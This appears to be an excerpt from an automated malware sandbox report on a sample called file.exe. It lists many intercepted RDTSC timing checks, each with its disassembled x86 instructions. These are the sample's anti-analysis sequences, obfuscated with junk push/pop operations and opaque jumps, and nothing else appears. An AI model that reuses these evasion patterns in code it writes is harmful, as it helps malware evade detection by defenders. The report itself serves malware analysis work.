Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B57F9 second address: 4B5839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F95D5269637h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F95D5269630h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D9 second address: 4D70FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D47CFB2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F95D47CFB26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F95D47CFB26h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D414 second address: 49D41E instructions: 0x00000000 rdtsc 0x00000002 js 00007F95D526963Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D41E second address: 49D43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB31h 0x00000009 jp 00007F95D47CFB2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D51BB second address: 4D51C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5497 second address: 4D549C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D55B9 second address: 4D55BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D56D4 second address: 4D56E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D56E7 second address: 4D571A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F95D5269626h 0x0000000b pop ecx 0x0000000c jmp 00007F95D5269634h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95D526962Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D571A second address: 4D571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D571E second address: 4D5736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5736 second address: 4D5765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB35h 0x00000007 je 00007F95D47CFB26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F95D47CFB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5765 second address: 4D5769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D58BE second address: 4D58C8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D47CFB26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D58C8 second address: 4D58DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F95D5269626h 0x0000000d jbe 00007F95D5269626h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDE7F second address: 4CDEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F95D47CFB39h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEA1 second address: 4CDEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEA7 second address: 4CDEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEB3 second address: 4CDEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEB9 second address: 4CDEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEBE second address: 4CDEC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEC3 second address: 4CDEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95D47CFB32h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEDC second address: 4CDEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7704 second address: 4A770D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6284 second address: 4D62A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F95D526962Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F95D5269626h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62A2 second address: 4D62BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F95D47CFB28h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62BC second address: 4D62D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269630h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62D1 second address: 4D62D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62D9 second address: 4D62DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62DD second address: 4D62FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB30h 0x00000007 je 00007F95D47CFB26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69B4 second address: 4D69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269635h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69CF second address: 4D69D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69D4 second address: 4D69DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D526962Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69DE second address: 4D69F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D69F4 second address: 4D69FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6CB5 second address: 4D6CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB33h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2DCE second address: 4E2DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 jmp 00007F95D5269635h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2DF5 second address: 4E2E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F95D47CFB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2E01 second address: 4E2E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FA7 second address: 4E2FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FB1 second address: 4E2FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F95D5269633h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FD1 second address: 4E2FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2FEB second address: 4E3001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269632h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3152 second address: 4E315C instructions: 0x00000000 rdtsc 0x00000002 je 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3564 second address: 4E357F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F95D5269632h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E36E8 second address: 4E3705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F95D47CFB36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3705 second address: 4E3726 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F95D526962Ah 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a jg 00007F95D5269626h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F95D5269636h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3886 second address: 4E38A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB37h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E38A6 second address: 4E38B2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269626h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6CF8 second address: 4E6CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6D7A second address: 4E6DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6C83E1DCh 0x00000011 mov si, B810h 0x00000015 call 00007F95D5269629h 0x0000001a jg 00007F95D526963Eh 0x00000020 push eax 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6DBB second address: 4E6E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ah 0x00000009 popad 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F95D47CFB39h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F95D47CFB36h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7084 second address: 4E7089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E710E second address: 4E7112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7112 second address: 4E712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E78C7 second address: 4E78EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F95D47CFB2Dh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F95D47CFB28h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7A42 second address: 4E7A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7B1F second address: 4E7B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D17 second address: 4E7D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7F39 second address: 4E7F57 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D47CFB34h 0x00000008 jmp 00007F95D47CFB2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7F57 second address: 4E7F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EAB16 second address: 4EAB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F95D47CFB26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA86A second address: 4EA874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA874 second address: 4EA878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB486 second address: 4EB48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB48A second address: 4EB490 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBF6C second address: 4EBF72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBC81 second address: 4EBC8B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBF72 second address: 4EBF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F95D5269626h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EBC8B second address: 4EBCA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F95D47CFB2Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED449 second address: 4ED46B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269636h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F95D5269626h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2343 second address: 4F23B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F95D47CFB28h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 stc 0x00000023 or edi, 77B9C9B2h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2803h], edi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F95D47CFB28h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d jmp 00007F95D47CFB2Bh 0x00000052 mov bx, si 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b pop edi 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F23B3 second address: 4F23CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269633h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDD60 second address: 4EDD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF1F9 second address: 4EF2A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F95D5269628h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1245F84Dh], ecx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor ebx, dword ptr [ebp+122D3357h] 0x0000003e mov eax, dword ptr [ebp+122D1461h] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F95D5269628h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e jbe 00007F95D526962Bh 0x00000064 add di, A298h 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007F95D5269638h 0x00000070 jmp 00007F95D526962Eh 0x00000075 nop 0x00000076 jnp 00007F95D5269638h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F23CA second address: 4F23CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDD67 second address: 4EDD71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A1 second address: 4EF2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A5 second address: 4EF2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A9 second address: 4EF2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1497 second address: 4F149B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2B6 second address: 4EF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F149B second address: 4F1537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95D526962Bh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F95D5269628h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 or dword ptr [ebp+122D2F8Bh], ecx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F95D5269628h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov dword ptr [ebp+1247B16Ch], edi 0x0000005d mov dword ptr [ebp+122D3335h], ebx 0x00000063 mov eax, dword ptr [ebp+122D08E9h] 0x00000069 jmp 00007F95D5269633h 0x0000006e push FFFFFFFFh 0x00000070 sub edi, 5EDBE7F9h 0x00000076 nop 0x00000077 pushad 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2BA second address: 4EF2D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F446A second address: 4F446E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1537 second address: 4F153F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2D7 second address: 4EF2E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F95D5269626h 0x0000000a rdtsc
